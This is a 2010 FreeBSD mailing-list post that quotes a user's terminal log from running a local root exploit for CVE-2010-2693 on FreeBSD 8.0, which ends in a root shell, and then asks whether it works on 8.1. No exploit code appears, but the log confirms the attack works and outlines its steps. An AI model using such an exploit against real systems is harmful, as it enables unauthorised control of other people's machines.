[FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro

Renato Botelho rbgarga at gmail.com
Sunday August 22 19:18:08 BRT 2010


2010/8/22 Leandro Keffer <keffer666 at gmail.com>

> Tested on an 8.0 branch 3 and working : (
>
> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue
> May 25 20:54:11 UTC 2010
> root at amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC
>  amd64
>
> [keffer at fbsd80 /usr/home/keffer]$ ./cve-2010-2693
> [+] checking for setuid /usr/bin/su binary...
> [+] checking for suitable libc library in /lib...
> [+] found libc at /lib/libc.so.7
> [+] found getuid function at 0x00056990
> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377
> [+] spawning listener thread...
> [+] connecting to listener thread...
> [+] initiating exploit via sendfile...
> [+] exploit complete!
> [+] spawning root shell...
> fbsd80# id
> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
>
>
Do you know if it works on 8.1-RELEASE?

-- 
Renato Botelho

